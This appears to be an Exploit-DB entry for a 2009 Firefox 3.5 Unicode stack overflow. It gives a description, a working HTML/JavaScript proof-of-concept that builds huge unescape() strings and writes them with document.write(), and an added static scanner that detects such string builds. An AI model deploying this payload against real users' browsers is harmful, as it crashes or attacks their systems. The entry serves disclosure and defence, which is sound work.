Vendor: Firefox
By: Andrew Haynes, Simon Berry-Byrne
CVSS: 9.3 (HIGH)
Type: Stack Overflow
CWE: 119
Product Name: Firefox
Affected Version From: 3.5
Affected Version To: 3.5
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2009

Firefox 3.5 unicode stack overflow

This is a stack overflow vulnerability in Firefox 3.5. The proof of concept combines two functions: unescape(), which converts %u escape sequences into a Unicode string, and mul8(), a helper defined in the proof of concept that repeats a string to a chosen length. The resulting strings are passed to document.write(), and the vulnerability is triggered when the string is longer than the stack can handle, resulting in a stack overflow.

Mitigation:

The vulnerability can be mitigated by disabling JavaScript in the browser or by using a different browser.

Exploit-DB raw data:

------------------------------------------->
Firefox 3.5 unicode stack overflow

Andrew Haynes , Simon Berry-Byrne


------------------------------------------->


<html>
<head>
<script language="JavaScript" type="Text/Javascript">
	var str = unescape("%u4141%u4141");
	var str2 = unescape("%u0000%u0000");
	var finalstr2 = mul8(str2, 49000000);
	var finalstr = mul8(str,   21000000);


document.write(finalstr2); 
document.write(finalstr); 

function mul8 (str, num) {
	var	i = Math.ceil(Math.log(num) / Math.LN2),
		res = str;
	do {
		res += res;
	} while (0 < --i);
	return res.slice(0, str.length * num);
}
</script>
</head>
<body>
</body>
</html>
<html><body></body></html>

# milw0rm.com [2009-07-15]
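
A detection-side companion to the proof of concept above, added here as an example and not part of the original Exploit-DB entry: it statically sizes the strings a script would build from unescape() literals and a repeat helper, without executing the script. The function names, the regex-based matching and the `budgetUnits` threshold are assumptions made for illustration.

```javascript
// Added example: static triage only; the scanned script is never executed.
// Constructed sample, modelled on the script lines of the PoC on this page.
const SAMPLE = `
var str = unescape("%u4141%u4141");
var str2 = unescape("%u0000%u0000");
var finalstr2 = mul8(str2, 49000000);
var finalstr = mul8(str,   21000000);
document.write(finalstr2);
document.write(finalstr);
`;

// UTF-16 code units produced by unescape(): each %uXXXX or %XX becomes one unit.
function decodedLength(escaped) {
  return escaped.replace(/%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}/g, 'x').length;
}

// Size of a doubling helper's result, computed without allocating anything.
// Assumption: the helper behaves like mul8(str, num) above (double, then slice).
function doublingCost(strLen, num) {
  const doublings = Math.max(1, Math.ceil(Math.log(num) / Math.LN2)); // do/while runs at least once
  return { peakUnits: strLen * 2 ** doublings, finalUnits: strLen * num };
}

// Flag helper(stringVar, N) assignments whose result exceeds budgetUnits.
// budgetUnits is a hypothetical triage threshold, not a browser limit.
function scanScript(source, budgetUnits = 1 << 24) {
  const strings = new Map(); // variable name -> decoded length in code units
  const findings = [];
  for (const m of source.matchAll(/var\s+(\w+)\s*=\s*unescape\(\s*"([^"]*)"\s*\)/g)) {
    strings.set(m[1], decodedLength(m[2]));
  }
  for (const m of source.matchAll(/var\s+(\w+)\s*=\s*(\w+)\(\s*(\w+)\s*,\s*(\d+)\s*\)/g)) {
    const [, target, helper, arg, count] = m;
    if (!strings.has(arg)) continue; // only track strings built from %u escapes
    const cost = doublingCost(strings.get(arg), Number(count));
    if (cost.finalUnits <= budgetUnits) continue;
    const written = new RegExp(`document\\.write\\(\\s*${target}\\s*\\)`).test(source);
    findings.push({ target, helper, ...cost, bytes: cost.finalUnits * 2, written });
  }
  return findings;
}

for (const f of scanScript(SAMPLE)) {
  console.log(`${f.target}: ${f.helper}() -> ${f.finalUnits} code units (${f.bytes} bytes at 2 per unit), ` +
              `peak ${f.peakUnits}, document.write=${f.written}`);
}
```

The peak figure is the intermediate string size before the helper's final slice(), which is the larger allocation of the two.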